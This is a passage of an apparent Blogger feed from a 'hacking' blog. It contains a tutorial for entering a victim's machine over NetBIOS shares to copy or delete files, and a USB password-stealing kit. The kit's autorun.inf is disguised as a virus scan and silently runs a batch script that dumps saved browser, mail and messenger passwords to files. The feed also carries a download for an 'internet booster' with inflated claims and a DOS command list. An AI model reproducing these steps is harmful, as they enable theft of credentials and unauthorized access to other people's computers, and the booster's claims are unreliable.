&lt;b style=&quot;color: #990000;&quot;&gt;NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: &amp;amp; D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “59.43.45.212? is the IP address of remote computer that you want to hack.&lt;br /&gt;
&lt;br /&gt;
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.&lt;br /&gt;
[ad code=1 align=center]&lt;br /&gt;
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if &lt;b&gt;WRITE-ACCESS&lt;/b&gt; is enabled on victim’s system.You can access filesfolders quickly through “&lt;b&gt;Command Prompt&lt;/b&gt;”.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt;: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: transparent; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/5938639300714091635/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/netbios-hacking-network-hack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/5938639300714091635'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/5938639300714091635'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/netbios-hacking-network-hack.html' title='Netbios Hacking - A Network hack'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq4Yj_kurECR-OCWUxrMQjUOmALHlO3hH1iIk4PCnla67ML5bZZZdmbzS_OEZHPipKy2Env1FP2dm0fi3eSRNZ-EZch3_Ih7XcynJnXeIbrCQDGenYSIH_0g_ec2NoJGJYdQdYvfAmviQ/s72-c/3531185385_2fdbd75f24.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1837659176326897052</id><published>2011-05-07T22:46:00.000-07:00</published><updated>2011-05-07T22:46:52.901-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Speedup Soft"/><title type='text'>full-speed-internet-booster-3.3</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt; &lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1NbPtlFHOu-JVjUUH1eWIN3VhUYvuUT2aXh0BXFww7zf0bfeOFun-gsTwiPYllcn_jjTFDkOJek_N7Inbg9_HAvvEGRM-RpzdBPgwGdn61E59lkR80UBZf8GQ6k69M51zDIXs-qngsvap/s1600/11izgr7.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1NbPtlFHOu-JVjUUH1eWIN3VhUYvuUT2aXh0BXFww7zf0bfeOFun-gsTwiPYllcn_jjTFDkOJek_N7Inbg9_HAvvEGRM-RpzdBPgwGdn61E59lkR80UBZf8GQ6k69M51zDIXs-qngsvap/s320/11izgr7.jpg&quot; width=&quot;286&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt; &lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: collapse; font-family: arial,verdana,tahoma,sans-serif; font-size: 13px; line-height: 19px;&quot;&gt;Full Speed&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot; style=&quot;background-attachment: scroll ! important; background-color: transparent ! important; background-image: none ! important; background-position: 0% 50%; border-bottom: 1px solid rgb(0, 153, 0) ! important; cursor: pointer ! important; display: inline ! important; font-family: arial,verdana,tahoma,sans-serif; font-size: 13px ! important; font-style: normal ! important; font-weight: normal ! important; padding-bottom: 1px ! important; position: static; text-decoration: underline ! important;&quot;&gt;software&lt;/span&gt;&amp;nbsp;is the most effective Internet Speed Booster and&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot; style=&quot;background-attachment: scroll ! important; background-color: transparent ! important; background-image: none ! important; background-position: 0% 50%; border-bottom: 1px solid rgb(0, 153, 0) ! important; cursor: pointer ! important; display: inline ! important; font-family: arial,verdana,tahoma,sans-serif; font-size: 13px ! important; font-style: normal ! important; font-weight: normal ! important; padding-bottom: 1px ! important; position: static; text-decoration: underline ! important;&quot;&gt;Internet Speed Test&lt;/span&gt;&amp;nbsp;software&amp;nbsp;available today!&lt;br /&gt;
&lt;br /&gt;
Just&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot; style=&quot;background-attachment: scroll ! important; background-color: transparent ! important; background-image: none ! important; background-position: 0% 50%; border-bottom: 1px solid rgb(0, 153, 0) ! important; cursor: pointer ! important; display: inline ! important; font-family: arial,verdana,tahoma,sans-serif; font-size: 13px ! important; font-style: normal ! important; font-weight: normal ! important; padding-bottom: 1px ! important; position: static; text-decoration: underline ! important;&quot;&gt;download&lt;/span&gt;, run, and click the Boost button. Now you will have 5 X&amp;nbsp;&lt;u&gt;faster internet&lt;/u&gt;, forever! You won’t believe how fast your high speed Internet Broadband can go.&lt;/span&gt;&lt;/div&gt;&lt;a href=&quot;http://julianhakingarticles.blogspot.com/2011/04/full-speed-internet-booster-33.html&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
Instantly Get:&lt;br /&gt;
&lt;br /&gt;
1. Overall&amp;nbsp;faster Internet&amp;nbsp;connection speed&lt;br /&gt;
2. Faster&amp;nbsp;download&amp;nbsp;speeds&lt;br /&gt;
3. Faster web site browsing&lt;br /&gt;
4. Improve Internet and Intranet performance&lt;br /&gt;
5. Quicker&amp;nbsp;download&amp;nbsp;times&lt;br /&gt;
6. Smoother streaming music and movies&lt;br /&gt;
7. Faster&amp;nbsp;download&amp;nbsp;for songs and video&lt;br /&gt;
8. Faster performance with email&lt;br /&gt;
9. Faster loading Web graphics&lt;br /&gt;
10. Faster loading Web pages&lt;br /&gt;
11.&amp;nbsp;Faster Internet&amp;nbsp;Explorer&lt;br /&gt;
12. Speed test for Web site browsing&lt;br /&gt;
13. Speed test for general data transfer&lt;br /&gt;
14. Works for businesses or home users&lt;br /&gt;
15. Improved VPN and WAN performance&lt;br /&gt;
16. Increased peak&amp;nbsp;download&amp;nbsp;speed&lt;br /&gt;
17. More consistent data transfer&lt;br /&gt;
18. Better data flow efficiency&lt;br /&gt;
19. Fewer corrupt downloads&lt;br /&gt;
20. Works over networks&lt;br /&gt;
21. Works with all ADSL/DSL modems and routers&lt;br /&gt;
22. Works over wireless&lt;br /&gt;
23. Smoother surfing&lt;br /&gt;
&lt;br /&gt;
* Tested on all Broadband technologies *&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial,verdana,tahoma,sans-serif; font-size: xx-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: collapse; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt; &lt;span id=&quot;goog_217972758&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.ziddu.com/download/10680845/FullSpeedInternet.3.3.rar.html&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;81&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGJLbJfXlxrz3d0EDmk0UIi31mgYBMAyCqrxpiiZbOkWufUnkF24bW3qmeo-BvqnXxhyphenhypheneYRXTd8I6dRH82GAS1oL2MVM-yi3BWJznO3Lht5Xv_yRrhRNPsMEsF6cJwvGB1Bg1vtzvBomNf/s320/d.gif&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1837659176326897052/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/full-speed-internet-booster-33.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1837659176326897052'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1837659176326897052'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/full-speed-internet-booster-33.html' title='full-speed-internet-booster-3.3'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1NbPtlFHOu-JVjUUH1eWIN3VhUYvuUT2aXh0BXFww7zf0bfeOFun-gsTwiPYllcn_jjTFDkOJek_N7Inbg9_HAvvEGRM-RpzdBPgwGdn61E59lkR80UBZf8GQ6k69M51zDIXs-qngsvap/s72-c/11izgr7.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-1683976566198754386</id><published>2011-05-07T22:34:00.000-07:00</published><updated>2011-05-07T22:34:28.735-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Usb Hack"/><title type='text'>Hacking Saved Password using USB</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;This tutorial explains how to hack passwords using usb flash drive . I’ve create one win rar file that contains all what you need to hack passwords using usb, it contains MessenPass,PasswordFox,Protected Passview,IE Passview,Mail passview, launch.bat , autorun.inf &lt;span id=&quot;more-8330&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;MessenPass&lt;/strong&gt; is a password recovery tool that reveals the passwords of the following instant messenger applications:MSN Messenger, Windows Messenger (In Windows XP) , Windows Live Messenger (In Windows XP/Vista/7) , Yahoo Messenger (Versions 5.x and 6.x), Google Talk, ICQ Lite 4.x/5.x/2003, AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro., Trillian, Trillian Astra, Miranda, GAIM/Pidgin, MySpace IM, PaltalkScene, Digsby&lt;br /&gt;
&lt;strong&gt;PasswordFox&lt;/strong&gt; is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.&lt;br /&gt;
&lt;strong&gt;Protected Storage PassView&lt;/strong&gt; is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.&lt;br /&gt;
&lt;strong&gt;IE PassView&lt;/strong&gt; is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don’t need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.&lt;br /&gt;
&lt;strong&gt;Mail PassView &lt;/strong&gt;is a small password-recovery tool that reveals the passwords and other account details for email clients.&lt;br /&gt;
&lt;strong&gt;Launch .bat &lt;/strong&gt;is batch script that runs all programs that I mention above . &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style=&quot;background-color: #f4cccc;&quot;&gt;&lt;code&gt;&lt;br /&gt;
start mspass.exe /stext mspass.txt&lt;br /&gt;
start mailpv.exe /stext mailpv.txt&lt;br /&gt;
start iepv.exe /stext iepv.txt&lt;br /&gt;
start pspv.exe /stext pspv.txt&lt;br /&gt;
start passwordfox.exe /stext passwordfox.txt&lt;/code&gt;&lt;/blockquote&gt;&lt;strong&gt;autorun.inf &lt;/strong&gt; will run launch.bat  after inserting the usb. &lt;br /&gt;
&lt;blockquote style=&quot;background-color: #fce5cd;&quot;&gt; &lt;code&gt;[autorun]&lt;br /&gt;
open=launch.bat&lt;br /&gt;
ACTION= Perform a Virus Scan&lt;/code&gt;&lt;/blockquote&gt;To hack passwords using usb  follow steps below&lt;br /&gt;
&lt;h4&gt;Step 1 &lt;/h4&gt;Download hackspc.com rar file that contains all Utilities and batch script you need , LINK&lt;br /&gt;
&lt;a href=&quot;https://rapidshare.com/files/459264709/www.julianhakingarticles.co.cc.rar&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;click Here for download&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://hackspc.com/wp-content/uploads/2011/03/rar.jpg&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;alignnone size-full wp-image-8331&quot; height=&quot;327&quot; src=&quot;http://hackspc.com/wp-content/uploads/2011/03/rar.jpg&quot; title=&quot;rar&quot; width=&quot;271&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h4&gt;Step 2 &lt;/h4&gt;Extract files from hackspc.com rar to usb , insert usb in computer that you want to hack , autorun window will pop-up , and password recovery tools will silently get executed and get stored in the .TXT files.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/1683976566198754386/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hacking-saved-password-using-usb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1683976566198754386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/1683976566198754386'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/hacking-saved-password-using-usb.html' title='Hacking Saved Password using USB'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8758676234514739420.post-6782354420434208170</id><published>2011-05-07T22:03:00.000-07:00</published><updated>2011-05-07T22:03:08.770-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking Commends"/><title type='text'>All Dos Commands and use</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;ADDUSERS           Add or list users to/from a CSV file&lt;br /&gt;
ARP               Address Resolution Protocol&lt;br /&gt;
ASSOC             Change file extension associations&lt;br /&gt;
ASSOCIAT One step file association&lt;br /&gt;
AT Schedule a command to run at a later time&lt;br /&gt;
ATTRIB             Change file attributes&lt;br /&gt;
&lt;br /&gt;
BOOTCFG          Edit Windows boot settings&lt;br /&gt;
BROWSTAT Get domain, browser and PDC info&lt;br /&gt;
&lt;br /&gt;
CACLS Change file permissions&lt;br /&gt;
CALL Call one batch program from another&lt;br /&gt;
CD Change Directory - move to a specific Folder&lt;br /&gt;
CHANGE Change Terminal Server Session properties&lt;br /&gt;
CHKDSK Check Disk - check and repair disk problems&lt;br /&gt;
CHKNTFS Check the NTFS file system&lt;br /&gt;
CHOICE Accept keyboard input to a batch file&lt;br /&gt;
CIPHER Encrypt or Decrypt files/folders&lt;br /&gt;
CleanMgr Automated cleanup of Temp files, recycle bin&lt;br /&gt;
CLEARMEM Clear memory leaks&lt;br /&gt;
CLIP Copy STDIN to the Windows clipboard.&lt;br /&gt;
CLS Clear the screen&lt;br /&gt;
CLUSTER Windows Clustering&lt;br /&gt;
CMD Start a new CMD shell&lt;br /&gt;
COLOR Change colors of the CMD window&lt;br /&gt;
COMP Compare the contents of two files or sets of files&lt;br /&gt;
COMPACT Compress files or folders on an NTFS partition&lt;br /&gt;
COMPRESS Compress individual files on an NTFS partition&lt;br /&gt;
CON2PRT Connect or disconnect a Printer&lt;br /&gt;
CONVERT Convert a FAT drive to NTFS.&lt;br /&gt;
COPY Copy one or more files to another location&lt;br /&gt;
CSVDE Import or Export Active Directory data &lt;br /&gt;
&lt;br /&gt;
DATE Display or set the date&lt;br /&gt;
Dcomcnfg DCOM Configuration Utility&lt;br /&gt;
DEFRAG Defragment hard drive&lt;br /&gt;
DEL Delete one or more files&lt;br /&gt;
DELPROF Delete NT user profiles&lt;br /&gt;
DELTREE Delete a folder and all subfolders&lt;br /&gt;
DevCon Device Manager Command Line Utility &lt;br /&gt;
DIR Display a list of files and folders&lt;br /&gt;
DIRUSE Display disk usage&lt;br /&gt;
DISKCOMP Compare the contents of two floppy disks&lt;br /&gt;
DISKCOPY Copy the contents of one floppy disk to another&lt;br /&gt;
DNSSTAT DNS Statistics&lt;br /&gt;
DOSKEY Edit command line, recall commands, and create macros&lt;br /&gt;
DSADD Add user (computer, group..) to active directory&lt;br /&gt;
DSQUERY List items in active directory&lt;br /&gt;
DSMOD Modify user (computer, group..) in active directory&lt;br /&gt;
&lt;br /&gt;
ECHO Display message on screen&lt;br /&gt;
ENDLOCAL End localisation of environment changes in a batch file&lt;br /&gt;
ERASE Delete one or more files&lt;br /&gt;
EXIT Quit the CMD shell&lt;br /&gt;
EXPAND Uncompress files&lt;br /&gt;
EXTRACT Uncompress CAB files&lt;br /&gt;
&lt;br /&gt;
FC Compare two files&lt;br /&gt;
FDISK Disk Format and partition&lt;br /&gt;
FIND Search for a text string in a file&lt;br /&gt;
FINDSTR Search for strings in files&lt;br /&gt;
FOR Conditionally perform a command several times&lt;br /&gt;
FORFILES Batch process multiple files&lt;br /&gt;
FORMAT Format a disk&lt;br /&gt;
FREEDISK Check free disk space (in bytes)&lt;br /&gt;
FSUTIL File and Volume utilities&lt;br /&gt;
FTP File Transfer Protocol&lt;br /&gt;
FTYPE Display or modify file types used in file extension associations&lt;br /&gt;
&lt;br /&gt;
GLOBAL Display membership of global groups&lt;br /&gt;
GOTO Direct a batch program to jump to a labelled line&lt;br /&gt;
&lt;br /&gt;
HELP Online Help&lt;br /&gt;
HFNETCHK Network Security Hotfix Checker &lt;br /&gt;
&lt;br /&gt;
IF Conditionally perform a command&lt;br /&gt;
IFMEMBER Is the current user in an NT Workgroup&lt;br /&gt;
IPCONFIG Configure IP&lt;br /&gt;
&lt;br /&gt;
KILL Remove a program from memory&lt;br /&gt;
&lt;br /&gt;
LABEL Edit a disk label&lt;br /&gt;
LOCAL Display membership of local groups&lt;br /&gt;
LOGEVENT Write text to the NT event viewer.&lt;br /&gt;
LOGOFF Log a user off&lt;br /&gt;
LOGTIME Log the date and time in a file&lt;br /&gt;
&lt;br /&gt;
MAPISEND Send email from the command line&lt;br /&gt;
MEM Display memory usage&lt;br /&gt;
MD Create new folders&lt;br /&gt;
MODE Configure a system device&lt;br /&gt;
MORE Display output, one screen at a time&lt;br /&gt;
MOUNTVOL Manage a volume mount point&lt;br /&gt;
MOVE Move files from one folder to another&lt;br /&gt;
MOVEUSER Move a user from one domain to another&lt;br /&gt;
MSG Send a message&lt;br /&gt;
MSIEXEC Microsoft Windows Installer&lt;br /&gt;
MSINFO Windows NT diagnostics&lt;br /&gt;
MSTSC Terminal Server Connection (Remote Desktop Protocol)&lt;br /&gt;
MUNGE Find and Replace text within file(s)&lt;br /&gt;
MV Copy in-use files&lt;br /&gt;
&lt;br /&gt;
NET Manage network resources&lt;br /&gt;
NETDOM Domain Manager&lt;br /&gt;
NETSH Configure network protocols&lt;br /&gt;
NETSVC Command-line Service Controller&lt;br /&gt;
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)&lt;br /&gt;
NETSTAT Display networking statistics (TCP/IP)&lt;br /&gt;
NOW Display the current Date and Time &lt;br /&gt;
NSLOOKUP Name server lookup&lt;br /&gt;
NTBACKUP Backup folders to tape&lt;br /&gt;
NTRIGHTS Edit user account rights&lt;br /&gt;
&lt;br /&gt;
PATH Display or set a search path for executable files&lt;br /&gt;
PATHPING Trace route plus network latency and packet loss&lt;br /&gt;
PAUSE Suspend processing of a batch file and display a message&lt;br /&gt;
PERMS Show permissions for a user&lt;br /&gt;
PERFMON Performance Monitor&lt;br /&gt;
PING Test a network connection&lt;br /&gt;
POPD Restore the previous value of the current directory saved by PUSHD&lt;br /&gt;
PORTQRY Display the status of ports and services&lt;br /&gt;
PRINT Print a text file&lt;br /&gt;
PRNCNFG Display, configure or rename a printer&lt;br /&gt;
PRNMNGR Add, delete, list printers set the default printer&lt;br /&gt;
PROMPT Change the command prompt&lt;br /&gt;
PsExec Execute process remotely&lt;br /&gt;
PsFile Show files opened remotely&lt;br /&gt;
PsGetSid Display the SID of a computer or a user&lt;br /&gt;
PsInfo List information about a system&lt;br /&gt;
PsKill Kill processes by name or process ID&lt;br /&gt;
PsList List detailed information about processes&lt;br /&gt;
PsLoggedOn Who&#39;s logged on (locally or via resource sharing)&lt;br /&gt;
PsLogList Event log records&lt;br /&gt;
PsPasswd Change account password&lt;br /&gt;
PsService View and control services&lt;br /&gt;
PsShutdown Shutdown or reboot a computer&lt;br /&gt;
PsSuspend Suspend processes&lt;br /&gt;
PUSHD Save and then change the current directory&lt;br /&gt;
&lt;br /&gt;
QGREP Search file(s) for lines that match a given pattern.&lt;br /&gt;
&lt;br /&gt;
RASDIAL Manage RAS connections&lt;br /&gt;
RASPHONE Manage RAS connections&lt;br /&gt;
RECOVER Recover a damaged file from a defective disk.&lt;br /&gt;
REG Read, Set or Delete registry keys and values&lt;br /&gt;
REGEDIT Import or export registry settings&lt;br /&gt;
REGSVR32 Register or unregister a DLL&lt;br /&gt;
REGINI Change Registry Permissions&lt;br /&gt;
REM Record comments (remarks) in a batch file&lt;br /&gt;
REN Rename a file or files.&lt;br /&gt;
REPLACE Replace or update one file with another&lt;br /&gt;
RD Delete folder(s)&lt;br /&gt;
RDISK Create a Recovery Disk&lt;br /&gt;
RMTSHARE Share a folder or a printer&lt;br /&gt;
ROBOCOPY Robust File and Folder Copy&lt;br /&gt;
ROUTE Manipulate network routing tables&lt;br /&gt;
RUNAS Execute a program under a different user account&lt;br /&gt;
RUNDLL32 Run a DLL command (add/remove print connections)&lt;br /&gt;
&lt;br /&gt;
SC Service Control&lt;br /&gt;
SCHTASKS Create or Edit Scheduled Tasks &lt;br /&gt;
SCLIST Display NT Services&lt;br /&gt;
ScriptIt Control GUI applications&lt;br /&gt;
SET Display, set, or remove environment variables&lt;br /&gt;
SETLOCAL Begin localisation of environment changes in a batch file&lt;br /&gt;
SETX Set environment variables permanently &lt;br /&gt;
SHARE List or edit a file share or print share&lt;br /&gt;
SHIFT Shift the position of replaceable parameters in a batch file&lt;br /&gt;
SHORTCUT Create a windows shortcut (.LNK file)&lt;br /&gt;
SHOWGRPS List the NT Workgroups a user has joined&lt;br /&gt;
SHOWMBRS List the Users who are members of a Workgroup&lt;br /&gt;
SHUTDOWN Shutdown the computer&lt;br /&gt;
SLEEP Wait for x seconds&lt;br /&gt;
SOON Schedule a command to run in the near future&lt;br /&gt;
SORT Sort input&lt;br /&gt;
START Start a separate window to run a specified program or command&lt;br /&gt;
SU Switch User&lt;br /&gt;
SUBINACL Edit file and folder Permissions, Ownership and Domain&lt;br /&gt;
SUBST Associate a path with a drive letter&lt;br /&gt;
SYSTEMINFO List system configuration&lt;br /&gt;
&lt;br /&gt;
TASKLIST List running applications and services&lt;br /&gt;
TIME Display or set the system time&lt;br /&gt;
TIMEOUT Delay processing of a batch file&lt;br /&gt;
TITLE Set the window title for a CMD.EXE session&lt;br /&gt;
TOUCH Change file timestamps &lt;br /&gt;
TRACERT Trace route to a remote host&lt;br /&gt;
TREE Graphical display of folder structure&lt;br /&gt;
TYPE Display the contents of a text file&lt;br /&gt;
&lt;br /&gt;
USRSTAT List domain usernames and last login&lt;br /&gt;
&lt;br /&gt;
VER Display version information&lt;br /&gt;
VERIFY Verify that files have been saved&lt;br /&gt;
VOL Display a disk label&lt;br /&gt;
&lt;br /&gt;
WHERE Locate and display files in a directory tree&lt;br /&gt;
WHOAMI Output the current UserName and domain&lt;br /&gt;
WINDIFF Compare the contents of two files or sets of files&lt;br /&gt;
WINMSD Windows system diagnostics&lt;br /&gt;
WINMSDP Windows system diagnostics II&lt;br /&gt;
WMIC WMI Commands&lt;br /&gt;
&lt;br /&gt;
XCACLS Change file permissions&lt;br /&gt;
XCOPY Copy files and folders&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://advancehacker.blogspot.com/feeds/6782354420434208170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://advancehacker.blogspot.com/2011/05/all-dos-commands-and-use.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6782354420434208170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8758676234514739420/posts/default/6782354420434208170'/><link rel='alternate' type='text/html' href='http://advancehacker.blogspot.com/2011/05/all-dos-commands-and-use.html' title='All Dos Commands and use'/><author><name>Ajay Goswami</name><uri>http://www.blogger.com/profile/12488503316083936543</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='29' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnmPJtYe85QJnFygmjSifgZS-qI3hN0XyhHDMmvfTd4NkWaMjW2zoWLNdEKVlmyL0IeYgUT-C0azLCl_LKmdDq0NgN3FYqErw4AsPSyZk4TY0rK8OWRLVO5Y_bLIlzmo/s220/Hacking.jpg'/></author><thr:total>0</thr:total></entry></feed>